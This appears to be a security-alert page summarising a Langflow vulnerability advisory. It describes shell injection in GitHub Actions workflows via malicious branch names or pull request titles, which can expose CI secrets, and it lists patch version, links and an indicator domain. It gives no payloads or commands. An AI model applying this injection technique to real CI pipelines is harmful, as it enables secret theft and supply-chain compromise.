top of page
perceptive_background_267k.jpg

Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub…

Published:

23 March 2026 at 23:00:00

Alert date:

24 March 2026 at 20:06:33

Source:

nvd.nist.gov

Click to open the original link from this advisory

Supply Chain & Dependencies, Web Technologies

An unauthenticated remote shell injection vulnerability exists in Langflow's GitHub Actions workflows prior to version 1.9.0. Attackers can inject arbitrary shell commands via malicious branch names or pull request titles through unsanitized GitHub context variables. This leads to secret exfiltration, infrastructure manipulation, and supply chain compromise during CI/CD execution. The vulnerability affects multiple workflow files and allows full access to CI secrets like GITHUB_TOKEN. Version 1.9.0 patches the issue by properly sanitizing user-controlled input.

Technical details

Mitigation steps:

Affected products:

Langflow

Related links:

https://nvd.nist.gov/vuln/detail/CVE-2026-33475
https://github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w

Related CVE's:

Related threat actors:

IOC's:

attacker.site

This article was created with the assistance of AI technology by Perceptive.

About us

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: Deze website toont informatie afkomstig van externe bronnen. Perceptive aanvaardt geen verantwoordelijkheid voor de inhoud, juistheid of volledigheid van deze informatie.

bottom of page